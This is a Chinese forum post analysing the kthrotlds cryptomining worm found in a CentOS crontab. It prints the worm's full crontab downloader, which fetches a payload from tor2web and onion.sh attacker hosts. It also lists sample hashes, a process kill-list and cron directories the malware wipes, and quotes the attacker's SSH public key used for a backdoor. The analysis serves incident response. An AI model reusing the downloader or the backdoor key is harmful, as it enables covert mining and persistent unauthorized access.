kthroltlds 挖矿蠕虫分析 安全响应中心

Laela 2019-8-20 352

最近遇到的一次后门事件,通过分析发现是一起挖矿蠕虫。通过查询CentOS计划任务crontab,发现以下计划任务。

已手工重新格式化如下: 

*/1 * * * * (tbin=$(command -v passwd); bpath=$(dirname "${tbin}");
curl="curl";
if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];
then curl="echo";
if [ "${bpath}" != "" ];
then for f in ${bpath}*;
do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break;
done;
fi;
fi;
wget="wget";
if [ $(wget --version 2>/dev/null|grep "wgetrc " |wc -l) -eq 0 ];
then wget="echo";
if [ "${bpath}" != "" ];
then for f in ${bpath}*;
do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break;
done;
fi;
fi;
if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ];
then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;
fi;
${curl} -fsSLk --max-time 40 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o ~/.ntp||
${curl} -fsSLk --max-time 40 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o ~/.ntp||
${curl} -fsSLk --max-time 40 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o ~/.ntp||
wget --quiet --no-check-certificate --timeout=40 https://an7kmd2wp4xo7hpr.onion.sh

Linux平台日常查询计划任务时,发现了如上一大串的命令,非常可疑。经关键字搜索,发现可以判断为最近的kthroltlds挖矿病毒。

链接如下:

What is Linux process "kthrotlds" and how do I kill or reduce its CPU impact? : linuxquestions

https://www.reddit.com/r/linuxquestions/comments/bpe9am/what_is_linux_process_kthrotlds_and_how_do_i_kill/


初步看这段shell脚本,发现最后出现的wget请求了一些公网地址,最后还修改了文件权限,之后启动了这个脚本,非常明显的恶意行为。

搜索了下这些域名中的Tor2web,发现这是一个软件项目,允许从标准浏览器访问Tor隐藏服务,而无需连接到Tor网络。

这里可以发现这些站点为攻击者转发到相应的Tor onion站点,通过中间人转发代理,可以使用标准浏览器进行访问,作用是隐藏攻击者的信息。


该脚本这里的作用为下载器,下载后续的恶意代码并执行。

接着看,最后wget下载了一个shell脚本,下载下来后,VT检测如下:


VT检测结果:

https://www.virustotal.com/gui/file/7e77257f92a0e912b37b7c5556bfb448a6aa6d6d951f498ad58db57db2ae6a16/detection

样本很新,发生在最近1个月内。


ldm脚本


MD5:529aa9ae456963bf203300fbd5b4e4f5

SHA-1:a2ca3481cd295bc2664587ac6a7804b5123dc3c1

SHA-256:7e77257f92a0e912b37b7c5556bfb448a6aa6d6d951f498ad58db57db2ae6a16


该样本第一次提交时间为2019-07-03 21:02:26 UTC


下面对该ldm脚本进行分析

一开始就是三个Tor转发代理站点,将这些信息拼接后,会得到三个实际的请求地址,循环对三个地址请求,来得到一个最终有效的地址,不过目前这个是隐藏的地址,无法追踪到来源。 
使用nohup命令,便于在后台运行脚本。 

在指定的目录下生成一些随机文件名的文件,出现两个计划任务配置,与之前的下载器的配置类似,方便后续对下载的脚本更新。

也是就是下载器下载完成后,就会执行之前随机文件名的脚本,接着使用ps aux命令查找是否有其他的挖矿进程与行为

"kworkerds\|56416\|xmr\|xig\|ddgs\|minerd\|hashvault\|geqn\|.kthreadd\|httpdz\|kworker\|config.json\|gwjyhs.com\|pastebin.com\|sobot.com\|kerbero


如果存在就杀死这些进程,接着通过访问ipinfo.io/ip得到当前机器的IP地址,将系统已经存在的任务计划目录,进行删除。

相关的路径如下:

/var/spool/cron/crontabs/*
/var/spool/cron/crontabs/.*
/var/spool/cron/*
/var/spool/cron/.*
/etc/cron.d/*
/etc/cron.d/.*
/etc/cron.hourly/*
/etc/cron.hourly/.*
/etc/cron.daily/*
/etc/cron.daily/.*

之后判断系统为哪个Linux发行版,使用相应系统的包管理工具来安装软件,这里是根据目录,使用不同的文件目录来创建任务计划。 

该脚本下载了busybox的rm,crond和crontab。 

crontab计划任务配置完成后,接着就开始对受害机器进行ssh配置,配置ssh免密登陆,具体配置可以查截图里具体命令。

skey="ssh-rsa  AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"

没了懒


少客联盟- 版权声明 1、本主题所有言论和图片纯属会员个人意见,与少客联盟立场无关。
2、本站所有主题由该帖子作者发表,该帖子作者Laela少客联盟享有帖子相关版权。
3、少客联盟管理员和版主有权不事先通知发贴者而删除本文。
4、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者Laela少客联盟的同意。
5、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任。
6、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责。
7、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意。
8、官方反馈邮箱:chinasuc@chinasuc.cn


上一篇:腾讯QQ升级程序存在漏洞利用植入后门病毒
下一篇:测试工程师常问的奇葩问题
这家伙太懒了,什么也没留下。
最新回复 (0)
    • 少客联盟
      2
        登录 注册 QQ登录(停用)
返回